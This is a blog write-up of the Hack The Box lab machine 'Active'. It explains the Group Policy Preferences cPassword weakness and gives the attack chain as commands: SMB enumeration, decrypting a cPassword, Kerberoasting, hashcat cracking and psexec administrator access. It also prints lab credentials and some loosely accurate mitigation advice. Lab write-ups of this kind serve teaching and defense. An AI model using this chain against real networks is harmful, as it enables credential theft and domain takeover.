Unwrapping GPP: Exposing the cPassword Attack Vector using Active (HTB Machine)

Welcome to my another blog post. In this blog we will be delving deep into a menacing aspect of network Vulnerabilities- The targeted Exploitation of cPasswords. So as the guardians of digital landscapes, it is imperative to understand how hackers manipulate and breach Active Directory’s defenses.

What is GPP ?

Imagine you’re the boss of a big company, and you have a bunch of computers that need to do specific things.

Now, instead of running around to each computer and setting everything up one by one (which would take forever!), you have a magic tool called “Group Policy Preferences” or GPP.

GPP is like your super assistant that helps you tell all the computers what to do, like where to put files, which programs to use, and what settings to follow. It’s like giving a secret code to all your computers so they know how to work together like a well-oiled team.

What made GPP vulnerable ?

Well the secret GPP used to hold on tight, was revealed by accident. OOPS!!!!

Fig: An accident

GPP or Group Policy Preferences allowed admins to create policies using embedded credentials.

Now most of the time these credentials were domain admin credentials and allows an adversary to access a domain admin account.

These credential were encrypted and placed in a “cPassword”.

This password was stored in a Groups.xml file in SYSVOL(SYSTEM VOLUME) of each domain controller in the domain.

Unfortunately, the key to decrypt cPassword was released accidentally.

Imagine if you hid your chocolate stash in the cookie jar, and now everyone knows about it!

Although this vulnerability was Patched in MS14–025, It is doesn’t prevent previous uses.

This is almost 9–10 years old. However if these older files were never deleted, then these password still exist and could work in the environment.

Demonstration of cPassword Attack with Active (HTB Machine)

For the Demonstration purposes, We will be solving HTB Machine Active which is vulnerable to this attack vector.

Fig: Active

Although this is a retired machine, you can access it along with some other retired machine with Hack The Box’s all new Hackers’ Bootcamp.

Do not Forget to add the Machine_IP and active.htb in /etc/hosts file.

First we will perform an Nmap scan on the target Machine.

nmap -Pn -A -T5 <Target-IP>

Fig: Enumeration with Nmap

As we can see that port 445 is open, We will try to enumerate the SMB shares with smbclient.

smbclient -L \\\\<Target-IP>\\

Fig: SMB Shares enumeration via smbclient

As we can login anonymously, we will now try to access the Replication Share using smbclient.

smbclient \\\\<Target-IP>\\Replication

Fig: Accessing Replication SMB Share

We found Something!!!

let’s get it on our attacker system with a simple command mget* .

We will then analyze it’s contents on our system.

Fig: mget* to get all files.

Now While navigating through the folders we will find a file (Groups.xml) which contains a cpassword along with a username.

We will crack the obtained cpassword with gpp-decrypt.

gpp-decrypt <Cpassword-Hash>

Fig: gpp-decrypt

We got the following credentials and we can use the smbclient to connect to the machine and perform further enumeration.

UserName: active.htb\SVC_TGS
Password: GPPstillstandingStrong2k18

smbclient //<target-IP>/Users -U <USER>

Did You Notice Something? of course you did. you are not a script Kiddie like me.

With the obtained credentials for SVC_TGS, Let’s Perform some kerberoasting.

For a perfect roast you need some hashes.

GetUserSPNs.py <Domain/Username:password> -dc-ip <ip of DC> -request

Fig: Get Dem Hashes

Now we will add the hash into a file and cook it with Hashcat.

hashcat -m 13100 <Hash File> <wordlist> -O

Fig: cracking Hashes with hashcat

And finally the Password is served. Which can be used to access the system as an Administrator via psexec.

psexec.py <Domain>/<username>:<password>@<Target-IP>

Now you can either gain access via smbclient first then perform kerberoasting or you can directly perform kerberoasting and access the system as administrator. Both approaches are fine.

Mitigation & Strategies

here are some mitigation strategies to protect against GPP/cPassword attacks:

• Regular Patching and Updates: Keep all systems, including domain controllers and client machines, up to date with the latest security patches and updates provided by Microsoft.
• Use Strong and Unique Local Administrator Passwords: Configure strong and unique local administrator passwords for all machines to prevent attackers from using extracted cPasswords.
• Use Group Policy Best Practices: Follow Microsoft’s best practices for Group Policy settings. Avoid storing sensitive information, like passwords, in Group Policy Preferences.
• Enable LAPS (Local Administrator Password Solution): Implement Microsoft’s LAPS tool to automatically manage and rotate local administrator passwords on domain-joined machines.
• Review and Remove LLMNR and NetBIOS: Disable Link-Local Multicast Name Resolution (LLMNR) and NetBIOS over TCP/IP to prevent attackers from using these protocols to extract cPasswords.

Conclusion

As we draw the curtains on our journey through the intricate landscape of Group Policy Preferences (GPP) and the enigmatic cPassword attack vector, one thing becomes abundantly clear: the world of technology, while empowering, also demands vigilant protection.

Thank you for joining me on this enlightening expedition. As you continue your journey in the realm of cybersecurity, may your every click be shielded, your every keystroke fortified, and your digital explorations anchored in the spirit of responsible stewardship